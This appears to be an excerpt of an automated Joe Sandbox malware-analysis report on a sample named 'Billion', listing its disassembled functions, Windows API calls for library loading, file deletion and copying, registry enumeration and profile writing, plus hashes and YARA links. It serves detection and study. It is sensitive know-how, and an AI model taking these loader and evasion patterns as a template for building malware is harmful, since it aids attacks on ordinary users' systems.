                                                                                                                                                                                                                                                                                                          • Opcode ID: fba11abdd9c6056f33fff72cd14a5adcdd4229c5ffa802e3fac785038fc077da
                                                                                                                                                                                                                                                                                                          • Instruction ID: 45514d80114b61ce12ebcaecb24f113a024077bba696dcf0f63e1c9d74533ec3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fba11abdd9c6056f33fff72cd14a5adcdd4229c5ffa802e3fac785038fc077da
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5118831A01129FBCB00DFA8D88ADEEBBB8EB04341F504462E916E3140C770FA91DBB1
                                                                                                                                                                                                                                                                                                          Function 001550DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0015508E,?,?,0015502E,?,001F98D8,0000000C,00155185,?,00000002), ref: 001550FD
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00155110
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0015508E,?,?,0015502E,?,001F98D8,0000000C,00155185,?,00000002,00000000), ref: 00155133
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                          • Opcode ID: 655226f1c4885e841067a45bd70e81b7bba435b0cd36a8c863c6255e4fce51a6
                                                                                                                                                                                                                                                                                                          • Instruction ID: aec20ccfd108de9c1d6a2fe5410646958a6d5d67e5be4db8cbd2c7296c5dfa08
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 655226f1c4885e841067a45bd70e81b7bba435b0cd36a8c863c6255e4fce51a6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4F04F31A00608FBDB119F95EC59FADBFB5EF08752F040069F809A6660DB749A84CA91
                                                                                                                                                                                                                                                                                                          Function 0018E778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32 ref: 0018E785
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0018E797
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0018E7BD
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                          • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                                          • API String ID: 145871493-2590602151
                                                                                                                                                                                                                                                                                                          • Opcode ID: f470bcb4b83b6570692f242d982e3a71477fe22f19f5597ccb18cad9ad6a67f0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2c595f1808b6a4dd54cd1367c77263efd3858f9803d9c7d248620630835c4c94
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f470bcb4b83b6570692f242d982e3a71477fe22f19f5597ccb18cad9ad6a67f0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19E06171801620DFD77577205C48E6A7694AF10B01F260568FC01F2060EB30CF84CF94
                                                                                                                                                                                                                                                                                                          Function 0013663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0013668B,?,?,001362FA,?,00000001,?,?,00000000), ref: 0013664A
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0013665C
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,0013668B,?,?,001362FA,?,00000001,?,?,00000000), ref: 0013666E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                                          • Opcode ID: 67f34d80477ff270dcce71c10f0fd2cf597d52b97a02b930fac382be0e86b389
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4f5d16e15d52d00feb199623ec447a041a49afbbaebffac8d8727d01605aa576
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67f34d80477ff270dcce71c10f0fd2cf597d52b97a02b930fac382be0e86b389
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22E0CD3560152227D2112725BC0EF6FA9689F92F62F094139FD04D2150DF54CC4180F5
                                                                                                                                                                                                                                                                                                          Function 00136607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00175657,?,?,001362FA,?,00000001,?,?,00000000), ref: 00136610
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00136622
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00175657,?,?,001362FA,?,00000001,?,?,00000000), ref: 00136635
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                                          • Opcode ID: 14231ee693de94dde6131956cc3c0047d48c593cbbe0e9b99445d5fe9197e0f2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 578c7da05548741f988f4f957fb3d0da43caeac0f2eb1c46496896c39fd84527
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14231ee693de94dde6131956cc3c0047d48c593cbbe0e9b99445d5fe9197e0f2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87D05B7561293177C23227257C1AE9F6F249FD1F513194039F904A2134CF60CD41C5D9
                                                                                                                                                                                                                                                                                                          Function 001A3306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001A35C4
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 001A3646
                                                                                                                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001A365C
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001A366D
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001A367F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 36a0f47adf65a686323b9ab4be6008e95d9973d6d17c04f95502cea9f002b811
                                                                                                                                                                                                                                                                                                          • Instruction ID: 86ca3af4e143eaaf05df818d79be705d04543babe40864366de423c178fc70a9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36a0f47adf65a686323b9ab4be6008e95d9973d6d17c04f95502cea9f002b811
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46B17D76E00219ABDF15DBA4CC85FDEBBBDEF19314F0040AAF519E6141EB349B448B61
                                                                                                                                                                                                                                                                                                          Function 001BADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 001BAE87
                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001BAE95
                                                                                                                                                                                                                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 001BAEC8
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001BB09D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4c21ad464367c8d1b70d523ec03240b0a07b114a36fb25b94eb5a34e9310fd07
                                                                                                                                                                                                                                                                                                          • Instruction ID: 267e8ba3fac03c47c0199142899c5f76b4e5a211f857712738599426cdd954ea
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c21ad464367c8d1b70d523ec03240b0a07b114a36fb25b94eb5a34e9310fd07
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FA1B0B1A04301AFE720EF24C886F2AB7E5AF54710F54885DF5999B6D2DBB1EC40CB81
                                                                                                                                                                                                                                                                                                          Function 001BC429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001BC10E,?,?), ref: 001BD415
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD451
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4C8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4FE
                                                                                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001BC505
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001BC560
                                                                                                                                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001BC5C3
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 001BC606
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 001BC613
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 94068f70db9be19d012bac19580ff25d0a0d798c311f8f9f93b77a18745e42dc
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2e150144d31612f3dc825d00f49f786977a22c1969513d5435505000082d6e41
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94068f70db9be19d012bac19580ff25d0a0d798c311f8f9f93b77a18745e42dc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69619371208241AFD714DF24C890E6ABBF5FF84308F54859CF4998B292DB31ED46CB91
                                                                                                                                                                                                                                                                                                          Function 0019ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0019D7CD,?), ref: 0019E714
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0019D7CD,?), ref: 0019E72D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019EAB0: GetFileAttributesW.KERNEL32(?,0019D840), ref: 0019EAB1
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0019ED8A
                                                                                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0019EDC3
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019EF02
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019EF1A
                                                                                                                                                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0019EF67
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0894b20d3925a935ab12912d470279ac99a36282559a79bb7a5078d67107115a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4aef7f402894ea456d2c08b55b13a959a4375ad2b6472bd75480a642281b63af
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0894b20d3925a935ab12912d470279ac99a36282559a79bb7a5078d67107115a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 625160B24083859BCB24EBA4D8919DBB3ECEF94300F40092EF699D7151EF75E688C756
                                                                                                                                                                                                                                                                                                          Function 00199517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00199534
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 001995A5
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 00199604
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00199677
                                                                                                                                                                                                                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001996A2
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 346fc2067a26ca09c7bb6186116d76ecee900adb2dad59ab7f554bfd4e04ada6
                                                                                                                                                                                                                                                                                                          • Instruction ID: e313734c95a72df767efa473e320845190a2d020d4fe64942d742268955582dd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 346fc2067a26ca09c7bb6186116d76ecee900adb2dad59ab7f554bfd4e04ada6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6513AB5A00619EFCB14CF68D884EAABBF9FF89314B15855DE905DB310E730E911CB90
                                                                                                                                                                                                                                                                                                          Function 001A9540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001A95F3
                                                                                                                                                                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 001A961F
                                                                                                                                                                                                                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 001A9677
                                                                                                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001A969C
                                                                                                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001A96A4
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b7397f55a955e939e820a875c021a444cb511756d7af8cdc2d80ae7da5f7731f
                                                                                                                                                                                                                                                                                                          • Instruction ID: b48dcdfb3712c93d64ea1abc31ef6275b6b2ffe400f00f02c12a48db99f6608f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7397f55a955e939e820a875c021a444cb511756d7af8cdc2d80ae7da5f7731f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4511975A00615AFDF05DF65C881AAABBF5FF59314F048058E849AB362CB35ED41CB90
                                                                                                                                                                                                                                                                                                          Function 001B9941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 001B999D
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 001B9A2D
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 001B9A49
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 001B9A8F
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 001B9AAF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0014F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,001A1A02,?,7644E610), ref: 0014F9F1
